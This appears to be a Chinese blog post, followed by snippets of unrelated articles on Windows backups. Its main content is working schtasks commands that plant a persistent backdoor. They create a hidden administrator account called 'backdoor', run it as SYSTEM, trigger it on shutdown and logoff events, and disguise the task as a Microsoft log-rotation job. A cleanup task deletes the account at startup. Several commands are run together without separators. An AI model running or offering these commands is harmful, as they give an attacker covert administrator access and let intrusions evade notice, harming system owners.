通過查詢相關事件,我採用兩種方式進行建立使用者
一種是以系統中eventid=1074,當觸發關閉電源操作時,進行建立使用者
schtasks /create /tn "microsoft\windows\localeventlogrotate" /tr "\"cmd.exe\" /k net user backdoor 123456 /add /y /active:yes > nul & net localgroup administrators backdoor /add > nul & net user backdoor /comment:\"built-in account for backdooring your network suckers\" > nul & exit" /f /ru system /sc onevent /ec system /mo "*[system[eventid=1074]]"schtasks /create /tn "microsoft\windows\localeventlogrotate" /tr "\"cmd.exe\" /k net user backdoor 123456 /add /y /active:yes >> nul & net localgroup administrators backdoor /add > nul & net user backdoor /comment:\"built-in account for backdooring your network suckers\" > nul & exit" /f /ru system /sc onevent /ec security /mo "*[system[provider[@name='microsoft-windows-security-auditing'] and eventid=4634]]"schtasks /create /tn "microsoft\windows
\localeventlog" /tr "\"cmd.exe\" /k net user backdoor /del > nul & exit" /f /ru system /sc onstart
通過一系列截圖可以清晰的看到命令都能正常執行,當單獨執行建立使用者時,建立的使用者完全可以執行與管理員使用者的許可權,瀏覽電腦檔案。
不足之處在於,當同時執行建立與刪除計畫任務的時候,直接進入backdoor使用者時,過幾秒後自動將本使用者登出並刪除。
利用計畫任務實現遊戲監控
任務計畫,又稱為計畫任務,是windows中可以定時執行預定任務的服務。利用任務計畫,可以讓計算機按照主人的計畫執行相應的程式 指令碼或者文件,如同乙個可以自動執行任務的 定時器 windows 7中,計畫任務面板所在的位置為 windows all programs accessories sys...
Windows中利用計畫任務實現自動備份檔案
我們來利用windows系統的計畫任務來實現資料庫的備份,是資料夾copy到固定的資料夾,是把資料夾copy以當天日期的自動生成的資料夾,大家可以發揮下結合下bat效果更佳 我們來利用windows系統的計畫任務來實現資料庫的備份,1,是資料夾copy到固定的資料夾,2.是把資料夾copy以當天日期...
window用計畫任務實現oracle資料備份
1.首先建立乙個資料夾取名為oracle backup 2.在oracle backup資料夾下建立三個資料夾分別取名為backup和old backup和script 3.在script資料夾下面建立3個檔案分別為 exp.txt和oracle bakup.bat和oracle bakup.vbs...